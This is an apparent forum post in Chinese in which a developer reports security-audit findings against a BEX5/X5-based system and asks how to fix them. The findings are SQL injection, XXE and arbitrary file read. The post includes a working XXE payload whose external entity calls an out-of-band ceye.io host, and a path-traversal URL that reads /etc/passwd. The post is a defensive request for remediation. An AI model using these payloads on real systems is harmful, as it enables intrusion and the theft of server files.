|
近期 公司安全部门对所有涉外的系统都做了一次安全检查
发现采用BEX5开发的系统存在以下安全问题,麻烦起步看看 能给个解决的方案,谢谢
1.bizData在保存数据的时候 存在sql注入漏洞
2.XXE漏洞(外部xml实体注入),比如请求地址和参数如下:
请求地址:
http://xx.com/BusinessServer/bus ... tivity=mainActivity
参数:
{"contentType":"application/json","accept":"application/json","process":"/SA/doc/docSearch/docSearchProcess"
,"activity":"mainActivity","actionFlag":"__action_0__","executor":"","executeContext":"","action":"queryDocSearch"
,"parameters":{"param":{"@type":"xml","xml":"<!DOCTYPE netspi [<!ENTITY xxe SYSTEM \"http://oa.dvjfeh.ceye.io\" >]><data><operate>&xxe;</operate></data>"}},"translateParameter":null}
以上参数全是明文
3.任意文件读取漏洞,比如:
baas/justep/attachment/simpleFileStore?storeFileName=../../../../../../../../etc/passwd&ownerID=C48D1173350040F5AB993D928D2CE924&realFileName=&operateType=download
总结下,很多请求,不管get/post,都会将明文作为参数来传递
不知道X5是否提供了自动参数加解密的功能
如果没有,该如何解决该问题
|
|